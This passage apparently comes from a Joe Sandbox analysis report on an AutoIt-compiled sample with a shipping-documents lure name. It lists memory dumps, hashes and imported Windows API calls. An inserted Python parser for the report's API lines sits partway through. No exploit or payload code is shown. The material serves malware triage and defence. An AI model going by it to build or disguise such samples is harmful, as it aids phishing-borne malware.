                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70f0524884e2d66e23010b1ba4c72321e1ee71a5c5c7c0bb82d0ab978bfdc379
                                                • Instruction ID: da737a78ae5964c8ffc129bd0c48053709852e28d027c7c18ca75fd46de82b4e
                                                • Opcode Fuzzy Hash: 70f0524884e2d66e23010b1ba4c72321e1ee71a5c5c7c0bb82d0ab978bfdc379
                                                • Instruction Fuzzy Hash: E4222970502755CFDF28AB19C4946BD77A3EB03318F64846AD8478B392DB34AE92CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 730b3c49caaba78eed49d18fe56e4b6f98e60f299f2a8146841dd494096e51d2
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 29C194B22050531ADB2D4639D4340FEBBE25AA37B135A076DE4B2CF6C5EF20D5A4D720
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 98486735e504d5b035531dd02fc072ca376ae7e00e0c8365c3f1f20d66e9c35d
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 14C1B4B220519309DF6D463A84340FEBBE25AA37B135A076DE4B2DF6D4EF20D5A4D720
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction ID: ba61ac31b9dd2ed380448e8d0f4ab915b56d572d3a917449cf1b4d9c1b1ec022
                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction Fuzzy Hash: 7941C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction ID: a888402703ce1defe235b539af9aff514d349e1ecc8a9111f2c799c08ce378cc
                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction Fuzzy Hash: 30019278A00109EFCB84DF98C5909AEF7F5FF88314F608599D909AB711D730AE51DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction ID: 1b9b0901d8a29dd2353f09a1e48437e2be2935a2516558f76b9e6036fdbdef4e
                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction Fuzzy Hash: 9D019278A04109EFCB88DF98C5909AEF7F5FB48314F208599D919AB715E730AE41DF80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,0071F910), ref: 007138AF
                                                • IsWindowVisible.USER32(?), ref: 007138D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: a2ebcbd2cae9b119228ff29e9d2451b455cc0649a55be22421c91097994555ab
                                                • Instruction ID: 09a62fb5d23ffd414fa2286f5a5cb2dd84d5f11a8f01d709548cc8aeba942410
                                                • Opcode Fuzzy Hash: a2ebcbd2cae9b119228ff29e9d2451b455cc0649a55be22421c91097994555ab
                                                • Instruction Fuzzy Hash: 44D19770204305DBCB54EF29C451AEE7BA6AF54344F10846CF8865B3E2DB39EE86CB95
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 0071A89F
                                                • GetSysColorBrush.USER32(0000000F), ref: 0071A8D0
                                                • GetSysColor.USER32(0000000F), ref: 0071A8DC
                                                • SetBkColor.GDI32(?,000000FF), ref: 0071A8F6
                                                • SelectObject.GDI32(?,?), ref: 0071A905
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0071A930
                                                • GetSysColor.USER32(00000010), ref: 0071A938
                                                • CreateSolidBrush.GDI32(00000000), ref: 0071A93F
                                                • FrameRect.USER32(?,?,00000000), ref: 0071A94E
                                                • DeleteObject.GDI32(00000000), ref: 0071A955
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0071A9A0
                                                • FillRect.USER32(?,?,?), ref: 0071A9D2
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071A9FD
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(00000012), ref: 0071AB99
                                                  • Part of subcall function 0071AB60: SetTextColor.GDI32(?,?), ref: 0071AB9D
                                                  • Part of subcall function 0071AB60: GetSysColorBrush.USER32(0000000F), ref: 0071ABB3
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(0000000F), ref: 0071ABBE
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(00000011), ref: 0071ABDB
                                                  • Part of subcall function 0071AB60: CreatePen.GDI32(00000000,00000001,_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{), ref: 0071ABE9
                                                  • Part of subcall function 0071AB60: SelectObject.GDI32(?,00000000), ref: 0071ABFA
                                                  • Part of subcall function 0071AB60: SetBkColor.GDI32(?,00000000), ref: 0071AC03
                                                  • Part of subcall function 0071AB60: SelectObject.GDI32(?,?), ref: 0071AC10
                                                  • Part of subcall function 0071AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0071AC2F
                                                  • Part of subcall function 0071AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071AC46
                                                  • Part of subcall function 0071AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0071AC5B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                • String ID:
                                                • API String ID: 4124339563-0
                                                • Opcode ID: 59560ce93a04222501295a2113f9775bbbfd6919ae8f26f52e5651bd6888fb99
                                                • Instruction ID: d37cb8f8c63d595241bbe969daef1817ced4b4729bc3fe4f5b34ac5b6fcff67a
                                                • Opcode Fuzzy Hash: 59560ce93a04222501295a2113f9775bbbfd6919ae8f26f52e5651bd6888fb99
                                                • Instruction Fuzzy Hash: AEA18071009305FFD7119F68DC08A9B7BAAFF88321F108A29F966D61E1D738D984CB56
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00692CA2
                                                • DeleteObject.GDI32(00000000), ref: 00692CE8
                                                • DeleteObject.GDI32(00000000), ref: 00692CF3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00692CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00692D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 006CC68B
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006CC6C4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006CCAED
                                                  • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                • SendMessageW.USER32(?,00001053), ref: 006CCB2A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006CCB41
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CCB57
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CCB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: d4e8242d7b7f50f4e7c23ce116d3c4660d22d788ef803efbec5aece3f2c8b4a6
                                                • Instruction ID: 27218b815b7193820ad795b36591a3bfa35c64ed9b9ed3d51f7e0f24a10a3d8a
                                                • Opcode Fuzzy Hash: d4e8242d7b7f50f4e7c23ce116d3c4660d22d788ef803efbec5aece3f2c8b4a6
                                                • Instruction Fuzzy Hash: 2A127C30600602EFDB54DF28C899BB9BBA6FF45320F54856DE499DB662C731E842CB91
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0071AB99
                                                • SetTextColor.GDI32(?,?), ref: 0071AB9D
                                                • GetSysColorBrush.USER32(0000000F), ref: 0071ABB3
                                                • GetSysColor.USER32(0000000F), ref: 0071ABBE
                                                • CreateSolidBrush.GDI32(?), ref: 0071ABC3
                                                • GetSysColor.USER32(00000011), ref: 0071ABDB
                                                • CreatePen.GDI32(00000000,00000001,_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{), ref: 0071ABE9
                                                • SelectObject.GDI32(?,00000000), ref: 0071ABFA
                                                • SetBkColor.GDI32(?,00000000), ref: 0071AC03
                                                • SelectObject.GDI32(?,?), ref: 0071AC10
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0071AC2F
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071AC46
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0071AC5B
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071ACA7
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0071ACCE
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0071ACEC
                                                • DrawFocusRect.USER32(?,?), ref: 0071ACF7
                                                • GetSysColor.USER32(00000011), ref: 0071AD05
                                                • SetTextColor.GDI32(?,00000000), ref: 0071AD0D
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0071AD21
                                                • SelectObject.GDI32(?,0071A869), ref: 0071AD38
                                                • DeleteObject.GDI32(?), ref: 0071AD43
                                                • SelectObject.GDI32(?,?), ref: 0071AD49
                                                • DeleteObject.GDI32(?), ref: 0071AD4E
                                                • SetTextColor.GDI32(?,?), ref: 0071AD54
                                                • SetBkColor.GDI32(?,?), ref: 0071AD5E
                                                Strings
                                                • _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{, xrefs: 0071ABDF, 0071ABE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID: _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{
                                                • API String ID: 1996641542-3308908821
                                                • Opcode ID: b9154f4d44bb018a01028b6563cf63325f3f93171d627cc931dab7e69cc65981
                                                • Instruction ID: 25652c77fbaa60b0bc5760b541af6d867b216c378fd88ca3876f56fbbad7850a
                                                • Opcode Fuzzy Hash: b9154f4d44bb018a01028b6563cf63325f3f93171d627cc931dab7e69cc65981
                                                • Instruction Fuzzy Hash: CF612DB1901218FFDB119FA8DC49EEE7B7AEB08320F10C125F915AB2E1D7799940DB94
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007077F1
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007078B0
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007078EE
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00707900
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00707946
                                                • GetClientRect.USER32(00000000,?), ref: 00707952
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00707996
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007079A5
                                                • GetStockObject.GDI32(00000011), ref: 007079B5
                                                • SelectObject.GDI32(00000000,00000000), ref: 007079B9
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007079C9
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007079D2
                                                • DeleteDC.GDI32(00000000), ref: 007079DB
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00707A07
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00707A1E
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00707A59
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00707A6D
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00707A7E
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00707AAE
                                                • GetStockObject.GDI32(00000011), ref: 00707AB9
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00707AC4
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00707ACE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 1cd028f51df3a3a6803039a405f2f8f74a54366d3b5ec797420a07067e067d1c
                                                • Instruction ID: 84fcb38703a9e48d9d70368584f559c88d08ed0a3669396abcd6d99b24dc138a
                                                • Opcode Fuzzy Hash: 1cd028f51df3a3a6803039a405f2f8f74a54366d3b5ec797420a07067e067d1c
                                                • Instruction Fuzzy Hash: 97A16271A40215BFEB14DB68DC4AFEE7BB9EB44711F008118FA15A71E0D7B8AD40CB68
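The "APIs" records in this report are the raw material for triage, but the HTML layout makes them readable only one record at a time. The parser below is an added example, not part of Joe Sandbox or of the analysed sample: it turns lines in exactly the format printed above ("• Func.MODULE(args), ref: addr", including the indented "Part of subcall function" lines) into structured call records and a per-record summary of imports by module, string literals passed as arguments, and direct versus subcall lines. The sample input is copied from the records above. The only assumption is the report's own argument layout: each argument is "?", an 8-digit hex immediate, or a string literal, and arguments are comma-separated, so a literal that itself contained a comma would be split.

```python
"""Parse Joe Sandbox "APIs" record lines into structured call records.

Added example for reading the per-function records in this report; it is
not part of Joe Sandbox or of the analysed sample.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One report line, e.g.
#   • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007079A5
#   • Part of subcall function 00691B41: InvalidateRect.USER32(...), ref: 00691B9A
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    func: str                  # imported function, e.g. CreateWindowExW
    module: str                # exporting module as printed, e.g. USER32
    args: tuple                # argument tokens exactly as printed ("?" = unresolved)
    ref: int                   # address of the call site in the dump
    subcall_of: Optional[int]  # callee address for "Part of subcall function" lines

    @property
    def string_args(self):
        """Argument tokens the report resolved to string literals.

        Assumption (the report's own layout): an argument is "?", an 8-digit
        hex immediate, or a string literal; literals containing a comma would
        be split by the comma-separated format.
        """
        return tuple(a for a in self.args if a != "?" and not HEX32.match(a))


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one API line, or None for any other report line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m["args"]
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    sub = m["subfn"]
    return ApiCall(
        func=m["func"],
        module=m["module"],
        args=args,
        ref=int(m["ref"], 16),
        subcall_of=int(sub, 16) if sub else None,
    )


def parse_record(lines):
    """Parse every API line of one record; headers and hash lines are skipped."""
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def summarize(calls):
    """Per-record view for triage: imports by module, literals, direct vs. subcall."""
    return {
        "modules": Counter(c.module for c in calls),
        "apis": sorted({f"{c.func}.{c.module}" for c in calls}),
        "strings": sorted({s for c in calls for s in c.string_args}),
        "direct": sum(1 for c in calls if c.subcall_of is None),
        "subcalls": sum(1 for c in calls if c.subcall_of is not None),
    }


# Sample input: lines copied from the records above (the AutoIt splash
# window, one subcall line, and the drive-type probe), plus one header line.
SAMPLE_LINES = [
    r"• DestroyWindow.USER32(00000000), ref: 007077F1",
    r"• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007078B0",
    r"• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00707946",
    r"• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007079A5",
    r"• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00707A59",
    r"  • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A",
    r"• GetDriveTypeW.KERNEL32(?,0071FAC0,?,\\.\,0071F910), ref: 006FB066",
    "Memory Dump Source",  # header line: must be ignored by the parser
]


if __name__ == "__main__":
    calls = parse_record(SAMPLE_LINES)
    for c in calls:
        print(f"{c.ref:08X} {c.func}.{c.module} strings={c.string_args}")
    print(summarize(calls))
```

Feeding a whole record's "APIs" block through `parse_record` and then `summarize` gives the same import set the report compresses into its "API ID" line, but with the call-site addresses and the literal arguments kept, which is what you need to jump from a summary such as "Window$Create$MessageSend" to the exact `CreateWindowExW` call that names the `AutoIt v3` window class.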
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FAF89
                                                • GetDriveTypeW.KERNEL32(?,0071FAC0,?,\\.\,0071F910), ref: 006FB066
                                                • SetErrorMode.KERNEL32(00000000,0071FAC0,?,\\.\,0071F910), ref: 006FB1C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 7b0f34ce0b20b27c74edfff13d4a9e8b1e7791a6704bc66791383da4f3c97a6c
                                                • Instruction ID: 9ad5df335fb600d6909f962f4d6a40786b626177b452169d6383b97d1b89d8ed
                                                • Opcode Fuzzy Hash: 7b0f34ce0b20b27c74edfff13d4a9e8b1e7791a6704bc66791383da4f3c97a6c
                                                • Instruction Fuzzy Hash: 6851B1706C430DFBCB10EB14C992DBD73B7AB147417209019E60AAB390CB799D42DB56
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 5aff4ed33e123a1cd7f5a09e8e60abc07d51e9c4e6bd6da59c36939baad834ea
